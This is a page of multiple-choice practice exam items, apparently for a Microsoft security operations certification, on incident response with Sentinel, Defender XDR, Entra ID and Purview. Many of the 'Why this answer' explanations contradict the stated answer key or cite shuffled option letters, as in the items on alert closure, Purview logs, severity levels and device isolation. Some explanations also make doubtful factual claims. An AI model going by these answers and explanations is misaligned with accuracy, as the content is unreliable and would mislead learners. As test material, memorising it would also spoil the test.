Isolation immediately stops C2 communication.

Why this answer

Option A is correct because isolating the device from the network immediately stops communication with the C2 server. Option B is wrong because killing processes may not stop network communication. Option C is wrong because scanning is reactive.

Option D is wrong because contacting the user could tip off the attacker.

422
MCQeasy

Which Microsoft Sentinel feature allows you to automatically respond to incidents by running a playbook when an incident is created?

A.Analytics rules
B.Playbooks
C.Watchlists
D.Workbooks
E.Automation rules
AnswerE

Automation rules can trigger playbooks on incident creation.

Why this answer

Automation rules in Microsoft Sentinel allow you to define automated responses to incidents, including running a playbook when an incident is created. They provide a centralized way to trigger actions based on incident properties such as severity, status, or specific tactics, without needing to embed automation logic directly in analytics rules.

Exam trap

The trap here is that candidates often confuse playbooks with automation rules, thinking playbooks themselves automatically respond to incidents, when in fact playbooks are the action components that must be triggered by an automation rule or manual invocation.

How to eliminate wrong answers

Option A is wrong because analytics rules generate alerts or incidents based on data queries, but they do not directly run playbooks; automation rules are the mechanism that triggers playbooks upon incident creation. Option B is wrong because playbooks are collections of actions (based on Azure Logic Apps) that can be run manually or via automation rules, but they are not the feature that automatically responds to incidents when created. Option C is wrong because watchlists are collections of data (e.g., IP addresses, hostnames) used for correlation and enrichment in analytics rules, not for automated incident response.

Option D is wrong because workbooks are interactive dashboards for visualizing and analyzing data, not for triggering automated responses.

423
Multi-Selecthard

Which TWO actions are valid containment steps for a compromised user account in Microsoft Defender XDR?

Select 2 answers
A.Create a new email rule to forward emails
B.Disable the user account in Microsoft Entra ID
C.Add the user to a privileged role
D.Reset the user's password
E.Run a full antivirus scan on the user's device
AnswersB, D

Containment by disabling.

424
MCQhard

Your organization uses Microsoft Sentinel. An incident is created from a fusion detection that combines multiple signals. You need to ensure that when the incident is resolved, all related alerts are also resolved automatically. What should you do?

A.Create an automation rule triggered when an incident is closed, with the action 'Close alert'
B.Create a playbook triggered on incident creation that closes alerts
C.Create an automation rule triggered when an alert is created
D.Configure the analytics rule to close alerts when the incident is resolved
AnswerA

This resolves all related alerts when the incident is closed.

Why this answer

Option D is correct because the 'Close incident' automation rule with a condition 'Alert was closed' causes alerts to close when the incident closes. Option A is wrong because analytics rules do not control alert closure on incident resolution. Option B is wrong because playbooks triggered on incident creation would not run on closure.

Option C is wrong because automation rules triggered on alert creation do not handle incident closure.

425
MCQmedium

During an incident investigation, you discover that an attacker used a legitimate account to access sensitive data in Microsoft Purview Information Protection. You need to identify what data was accessed and by whom. Which log source should you query?

A.Microsoft 365 Defender alerts
B.Microsoft Purview data access logs
C.Microsoft Entra ID sign-in logs
D.Office 365 audit logs (unified audit log)
AnswerB

Purview logs track access to sensitive data, including who accessed what.

Why this answer

Option D is correct because Purview logs track access to sensitive data. Option A is wrong because Azure AD sign-in logs show authentication only. Option B is wrong because Office 365 audit logs may not include Purview data access.

Option C is wrong because Microsoft 365 Defender alerts are for detections, not detailed access logs.

426
Multi-Selecteasy

Which THREE are valid incident severity levels in Microsoft Sentinel?

Select 3 answers
A.Critical
B.Low
C.High
D.Informational
E.Medium
AnswersB, C, E

Low is a valid severity level.

Why this answer

The correct answers are A, B, and D. Sentinel uses Low, Medium, High, and Informational. Critical is not a level; the highest is High.

Informational is a valid severity.

427
Multi-Selecthard

Which THREE steps are part of the containment phase of incident response in a hybrid environment using Microsoft Defender XDR?

Select 3 answers
A.Remove malware from affected systems
B.Restore data from backups
C.Disable compromised user accounts in Microsoft Entra ID
D.Isolate affected devices using Microsoft Defender for Endpoint
E.Block malicious IP addresses at the firewall
AnswersC, D, E

Stops further access.

Why this answer

Option A is correct because isolation prevents spread. Option B is correct because disabling accounts stops credential misuse. Option D is correct because blocking IoCs is a containment action.

Option C is wrong because this is eradication. Option E is wrong because this is recovery.

428
MCQhard

A SOC analyst is responding to a ransomware incident. The analyst identifies that the ransomware encrypted files on a file share and left a ransom note. The analyst needs to prevent the ransomware from spreading to other shares. Which action should the analyst take first?

A.Revoke the user's access to the file share.
B.Run a full antivirus scan on the server.
C.Restore the encrypted files from backup.
D.Isolate the server from the network using Microsoft Defender for Endpoint's device isolation.
AnswerD

Isolation prevents further communication and spread.

Why this answer

Option D is correct because isolating the affected server from the network stops the spread. Option A is wrong because restoring files does not prevent spread. Option B is wrong because antivirus may not detect unknown ransomware.

Option C is wrong because revoking user access does not stop the ransomware process.

429
Multi-Selectmedium

Which TWO actions should you take when responding to a confirmed data exfiltration incident involving Microsoft 365? (Choose two.)

Select 2 answers
A.Reset passwords for all users
B.Revoke user sessions in Microsoft Entra ID
C.Review audit logs in Microsoft Purview compliance portal
D.Disable all external sharing in SharePoint
E.Block all access to the tenant
AnswersB, C

Revoking sessions stops ongoing exfiltration.

Why this answer

Option A is correct: Contain the activity by revoking user sessions. Option D is correct: Investigate by reviewing audit logs to determine scope. Option B is wrong because resetting password for all users is excessive.

Option C is wrong because disabling all external sharing is too broad. Option E is wrong because blocking tenant access is disruptive and premature.

430
Multi-Selecthard

Which THREE are valid data connectors in Microsoft Sentinel for ingesting security events from Microsoft 365 services? (Choose three.)

Select 3 answers
A.Microsoft 365 Defender
B.Microsoft Purview
C.Microsoft Intune
D.Microsoft Entra ID
E.Office 365
AnswersA, D, E

Ingests alerts and incidents from Microsoft Defender XDR.

Why this answer

Options A, C, and D are valid connectors. A: Microsoft Entra ID (formerly Azure AD) connector ingests sign-in logs and audit logs. C: Microsoft 365 Defender connector ingests alerts from Defender for Endpoint, Office 365, etc.

D: Office 365 connector ingests Exchange, SharePoint, Teams logs. Option B is wrong because Microsoft Purview is a compliance portal, not a data connector. Option E is wrong because Microsoft Intune is a device management service, but its logs are ingested via other connectors (e.g., Azure AD).

431
MCQmedium

Your organization uses Microsoft Defender for Cloud Apps. You discover that a user has been accessing sensitive data from an anonymous IP address. The user's account appears to be compromised. You need to prevent further data exfiltration. What should you do?

A.Disable the user account in Microsoft Entra ID.
B.Create an IP range policy in Defender for Cloud Apps to block the anonymous IP.
C.Change the user's password and revoke sessions.
D.Suspend the user in Microsoft Defender for Cloud Apps.
AnswerD

Suspending instantly blocks all app access.

Why this answer

Suspending the user in Defender for Cloud Apps immediately blocks all access to cloud apps, preventing data exfiltration. Option A is incorrect because changing password alone may not terminate existing sessions. Option C is incorrect because disabling the account in Microsoft Entra ID is broader but also effective; however, suspending in Defender for Cloud Apps is more immediate for cloud app access.

Option D is not directly possible.

432
Multi-Selecthard

Which THREE actions are appropriate when investigating a potential data exfiltration incident in Microsoft Defender for Cloud Apps?

Select 3 answers
A.Check the device inventory for suspicious applications
B.Use the app dashboard to view unusual behavior alerts
C.Suspend the user's account immediately
D.Check the file policy matches for the user
E.Review the user's activity log in Defender for Cloud Apps
AnswersB, D, E

Dashboard highlights anomalies.

Why this answer

Options A, B, and D are correct. Option A: Reviewing the activity log helps identify the scope of exfiltration. Option B: Using the app dashboard to see unusual behavior provides context.

Option D: Checking the file policy matches shows which files were flagged. Option C is wrong because suspending the user is a containment action, not investigation. Option E is wrong because checking device inventory does not apply to cloud apps.

433
MCQmedium

Your organization uses Microsoft Sentinel with the Microsoft Defender for Cloud connector enabled. You receive an incident that alerts on 'Suspicious resource deployment' from a user who has been compromised. The incident involves the deployment of a virtual machine in a subscription that is normally not used by that user. The incident severity is High. You need to contain the threat immediately. The deployment is still in progress. What should you do first?

A.Investigate the Azure Activity logs to see what other resources were deployed.
B.Disable the user account in Microsoft Entra ID.
C.Apply a resource lock to the subscription to block all deployments.
D.Delete the virtual machine that is being deployed.
AnswerC

A resource lock prevents any new resource creation, containing the attack.

Why this answer

Option C is correct because locking the subscription prevents any further resource creation, containing the threat immediately. Option A is wrong because investigating logs takes time. Option B is wrong because deleting the VM may not stop other deployments.

Option D is wrong because disabling the user account does not stop the deployment session.

434
MCQeasy

During an incident investigation, you find that a user's credentials were used to sign in from an unfamiliar location. You want to force a password reset and revoke all sessions immediately. Which action should you take in the Microsoft 365 Defender portal?

A.Disable the user account in Microsoft Entra ID.
B.Block the user's sign-in from the unfamiliar location via Conditional Access.
C.Use the 'Require password reset' action from the user investigation page.
D.Remove the user's MFA registration to force re-registration.
AnswerC

This action forces a password reset and revokes all current sessions.

Why this answer

Option B is correct because 'Require password reset' in the user investigation section revokes sessions and forces a reset. Option A is wrong because disabling the account blocks access but does not reset credentials. Option C is wrong because blocking sign-in requires additional configuration.

Option D is wrong because MFA registration does not reset the password.

435
MCQmedium

Your organization uses Microsoft Sentinel. A new incident is created from a fusion alert that combines multiple low-severity alerts. The analyst needs to determine the entities involved. What should the analyst review?

A.The Sentinel Overview workbook.
B.The incident's entities tab.
C.The analytics rule that generated the incident.
D.The incident's timeline.
AnswerB

Entities tab shows all related entities.

Why this answer

Option C is correct because the incident entities tab lists all entities (users, IPs, hosts) related to the incident. Option A is wrong because the analytics rule is the source, not entities. Option B is wrong because the workbook may not show entities for a specific incident.

Option D is wrong because the incident timeline shows events, not entities.

436
MCQhard

A security team is investigating a ransomware incident that encrypted files on several Windows servers. Microsoft Defender for Endpoint detected the ransomware but the initial infection vector is unknown. Which KQL query in Microsoft Sentinel would BEST identify the initial process that executed the ransomware?

A.DeviceNetworkEvents | where RemoteUrl contains 'malicious' | project DeviceName, RemoteIP, Timestamp
B.DeviceFileEvents | where FileName contains 'ransomware.exe' | project DeviceName, ActionType, Timestamp
C.DeviceProcessEvents | where FileName contains 'ransomware.exe' | project DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, Timestamp
D.DeviceEvents | where ActionType == 'RansomwareDetection' | project DeviceName, Timestamp
AnswerC

Shows process creation and the parent process that launched it.

Why this answer

Option B is correct because DeviceProcessEvents tracks process creation events and can trace parent-child relationships. Option A is wrong because DeviceFileEvents tracks file changes, not process creation. Option C is wrong because DeviceNetworkEvents tracks network connections, not processes.

Option D is wrong because DeviceEvents includes various events but not as directly for process ancestry.

437
MCQmedium

Contoso uses Microsoft Sentinel with Microsoft Defender XDR connector. You receive an incident titled 'Malware detected on endpoint' from Microsoft Defender for Endpoint. The incident includes a detailed timeline showing that the malware was downloaded from a malicious URL. You need to respond to the incident using Microsoft Sentinel and Microsoft Defender XDR capabilities. The affected device is a Windows 10 workstation used by a standard user. You have been asked to contain the threat and prevent recurrence. The organization has a policy to preserve evidence for 90 days. Which action should you take FIRST?

A.Reset the user's password and revoke sessions in Microsoft Entra ID.
B.Create a custom detection rule in Microsoft Sentinel for the malicious URL.
C.Block the malicious URL at the firewall using Microsoft Defender for Cloud Apps.
D.Isolate the device using Microsoft Defender for Endpoint device isolation.
AnswerD

Stops the malware from communicating and spreading.

Why this answer

Option B is correct: isolating the device in MDE stops the malware from spreading and communicating with C2. Option A is wrong because resetting password does not remove malware. Option C is wrong because creating a detection rule is proactive but not immediate.

Option D is wrong because blocking the URL is good but does not contain the already infected device.

438
MCQmedium

A security analyst uses Microsoft Sentinel to investigate an incident involving data exfiltration from Azure Blob Storage. The analyst needs to determine which user accessed the storage account and from which IP address. Which data source should the analyst query?

A.Azure AD sign-in logs
B.Azure Activity logs
C.Azure Security Center alerts
D.Azure Monitor metrics
AnswerB

Activity logs record data plane operations, including storage account access.

Why this answer

Option B is correct because Azure Activity logs storage account management events, including access logs. Option A is wrong because Azure AD sign-in logs only show authentication to Azure AD, not storage access. Option C is wrong because Azure Monitor metrics are aggregated and don't show per-user access.

Option D is wrong because Azure Security Center provides security recommendations, not access logs.

439
Multi-Selecthard

Which THREE of the following are valid incident management capabilities in Microsoft Sentinel? (Choose three.)

Select 3 answers
A.Assign incidents to analysts or teams
B.Classify incidents as true positive, false positive, or benign positive
C.Merge related incidents into a single incident
D.Create playbooks to automate incident response
E.Create workbooks to visualize incident trends
AnswersA, B, C

Assignment is an incident management capability.

Why this answer

The correct answers are A, B, and C. Incident classification, assignment, and merging are all incident management capabilities. Option D is wrong because playbook creation is not incident management; it's automation.

Option E is wrong because workbook creation is for reporting, not incident management.

440
MCQhard

An analyst runs this advanced hunting query to investigate suspicious command-line activity. Which type of activity is this query most likely detecting?

A.Execution of obfuscated scripts via encoded commands
B.Data exfiltration to external IPs
C.Privilege escalation attempts
D.Port scanning activity
AnswerA

The -enc flag indicates base64-encoded commands used for obfuscation.

Why this answer

Option B is correct because -enc (encoded command) is commonly used in malicious PowerShell commands to obfuscate. Option A is wrong because port scanning does not use encoded commands. Option C is wrong because data exfiltration typically involves network connections, not encoded commands.

Option D is wrong because privilege escalation is not directly indicated by encoded commands.

441
MCQmedium

Your organization has Microsoft Sentinel deployed in a central Log Analytics workspace. You have a custom analytics rule that detects brute-force attacks against Azure AD by counting failed sign-ins from the same IP address within 5 minutes. The rule currently generates an incident for every 10 failed attempts. During a recent incident, a single IP address generated over 200 failed sign-ins in 10 minutes, resulting in 20 separate incidents. The SOC team is overwhelmed and wants to reduce the number of incidents without lowering the detection threshold. You need to modify the rule to generate only one incident per IP address within a 1-hour window. What should you do?

A.Enable alert suppression in the analytics rule for 1 hour
B.Modify the analytics rule to group alerts by IP address with a 1-hour window
C.Create a new analytics rule that triggers only when failed sign-ins exceed 200 in 5 minutes
D.Create an automation rule that closes duplicate incidents from the same IP
AnswerB

Grouping by IP address consolidates all alerts from the same IP into one incident per hour.

Why this answer

Option A is correct because grouping alerts by IP address and setting a 1-hour window will consolidate all alerts from that IP into one incident. Option B is wrong because suppression only suppresses alerts after an incident is created, it doesn't group them. Option C is wrong because a separate analytics rule would still generate multiple incidents.

Option D is wrong because an automation rule cannot change incident grouping after alerts are created.

442
Multi-Selectmedium

Which TWO actions should an analyst take when a confirmed ransomware incident is detected on multiple endpoints? (Choose TWO.)

Select 2 answers
A.Run a full antivirus scan on all endpoints.
B.Isolate affected endpoints using Microsoft Defender for Endpoint.
C.Block known malicious IP addresses and domains in the firewall.
D.Disconnect network cables but leave endpoints powered on.
E.Shut down all affected endpoints to prevent data loss.
AnswersB, C

Immediately contains the threat by isolating devices.

Why this answer

Option A is correct because isolating endpoints stops encryption. Option C is correct because blocking indicators prevents spread. Option B is wrong because it destroys evidence.

Option D is wrong because it allows encryption to continue. Option E is wrong because it's reactive, not immediate containment.

443
MCQhard

You are handling an incident where a user's account was used to access sensitive data from an unusual location. Microsoft Entra ID Identity Protection flagged the sign-in as risky. You need to determine if the account is compromised. Which investigation step should you perform first?

A.Block the user from signing in
B.Force a password reset for the user
C.Check if the device used is managed by Intune
D.Review the sign-in details and compare with the user's typical behavior
AnswerD

Determines if the sign-in is anomalous.

Why this answer

Option C is correct because checking the user's recent activity provides context. Option A is wrong because force password reset may alert the attacker. Option B is wrong because blocking sign-in is premature.

Option D is wrong because the device might be the user's personal device.

444
MCQhard

Your organization is using Microsoft Defender for Cloud to protect Azure workloads. A critical vulnerability was discovered in a virtual machine that is part of a production application. The vulnerability has a high severity score and is actively being exploited in the wild. You need to respond quickly to mitigate the risk. What is the most effective immediate action?

A.Apply the vendor patch immediately during business hours.
B.Enable just-in-time (JIT) VM access in Microsoft Defender for Cloud to lock down inbound traffic.
C.Modify the network security group (NSG) to block all inbound traffic to the VM.
D.Use the 'Remediate' option in Defender for Cloud to automatically apply the patch.
AnswerB

JIT reduces exposure by only allowing necessary traffic at scheduled times.

Why this answer

Enabling just-in-time (JIT) VM access reduces the attack surface by restricting inbound traffic to the VM, providing immediate protection. Option A is incorrect because patching may take time and could disrupt operations. Option B is incorrect because network security groups (NSGs) are already in place and changing rules may not address the vulnerability directly.

Option D is incorrect because Defender for Cloud does not have automatic patching; it only recommends.

445
MCQmedium

During a security incident, you need to collect forensic evidence from a compromised Windows device. Which Microsoft Defender for Endpoint action should you use to collect a memory dump?

A.Initiate Live Response
B.Isolate device
C.Collect investigation package
D.Run antivirus scan
AnswerC

Investigation package includes memory dump, registry, and file collection.

Why this answer

Option C is correct because 'Collect investigation package' gathers forensic data including memory dump. Option A is wrong because 'Run antivirus scan' only scans for malware. Option B is wrong because 'Isolate device' disconnects from network but does not collect memory.

Option D is wrong because 'Initiate Live Response' provides remote shell but does not specifically collect memory dump as a single action.

446
MCQhard

Your organization uses Microsoft Purview to manage insider risk. A user is suspected of exfiltrating data via email. The incident response team needs to preserve a copy of the user's mailbox for legal hold. Which action should be taken?

A.Place the mailbox on an eDiscovery hold.
B.Place the mailbox on litigation hold.
C.Disable the user's multi-factor authentication to prevent access.
D.Apply a Microsoft Purview retention policy to the user's mailbox.
AnswerB

Litigation hold preserves all mailbox content, including deleted items, for legal purposes.

Why this answer

Option C is correct because a litigation hold preserves all mailbox content, including deleted items. Option A is wrong because eDiscovery hold is for specific searches, not full preservation. Option B is wrong because retention policies apply to all mailboxes, not targeted.

Option D is wrong because MFA disablement does not preserve data.

447
MCQeasy

Refer to the exhibit. You are deploying this analytics rule in Microsoft Sentinel. Which activity will trigger an alert?

A.cmd.exe launching winword.exe
B.Any process creation event
C.Winword.exe execution
D.Any cmd.exe execution
E.Word launching cmd.exe
AnswerE

Exactly matches the query.

Why this answer

The query detects when cmd.exe is created by winword.exe, indicating a potential macro-based attack. It does not look for other processes or parent processes.

448
MCQmedium

You are investigating a suspicious sign-in reported in Microsoft Defender for Cloud Apps. The activity shows that a user accessed a sensitive SharePoint site from an anonymous IP address. What is the most effective immediate response to prevent further access?

A.Suspend the user account in Microsoft 365 Defender.
B.Change the SharePoint site permissions to remove the user's access.
C.Disable the user's device in Microsoft Intune.
D.Add the anonymous IP address to the blocked IP address list in Conditional Access.
AnswerA

Suspending the user immediately revokes access to all cloud apps until further investigation.

Why this answer

Option D is correct because suspending the user immediately blocks access to all cloud apps. Option A is wrong because disabling the device does not prevent cloud access from other devices. Option B is wrong because changing permissions on the site does not address the user's compromised state.

Option C is wrong because blocking the IP may not be effective if the attacker uses different IPs.

449
MCQhard

During a ransomware incident, a security analyst needs to isolate an affected Windows 10 device managed by Microsoft Intune. The device is currently online and connected to the corporate network. Which remediation action should be taken from Microsoft Defender XDR to achieve this?

A.Block the device in Microsoft Intune
B.Initiate device isolation from the Microsoft Defender for Endpoint console
C.Disable the Windows Firewall via Intune
D.Run a full antivirus scan from Microsoft Defender for Endpoint
AnswerB

Device isolation blocks all network traffic except to the Defender service, containing the threat.

Why this answer

Option A is correct because device isolation in Microsoft Defender for Endpoint disconnects the device from the network while allowing communication with the Defender service. Option B is wrong because running a full antivirus scan does not isolate the device. Option C is wrong because turning off Windows Firewall would increase exposure.

Option D is wrong because blocking the device in Intune revokes access to resources but does not isolate the device from the network.

450
Multi-Selectmedium

Which THREE of the following are valid incident response actions in Microsoft Defender XDR?

Select 3 answers
A.Isolate a device.
B.Reset user password.
C.Block a malicious URL.
D.Delete an email message.
E.Disable a user account.
AnswersA, D, E

Isolation is a response action available in Defender XDR.

Why this answer

Options A, C, and E are correct because isolating a device, disabling a user account, and deleting an email are common response actions. Option B is wrong because resetting a password is done in Microsoft Entra ID. Option D is wrong because blocking a URL is done in Defender for Office 365, not directly in Defender XDR incident actions.

← PreviousPage 6 of 7 · 489 questions totalNext →

Ready to test yourself?

Try a timed practice session using only Respond to security incidents questions.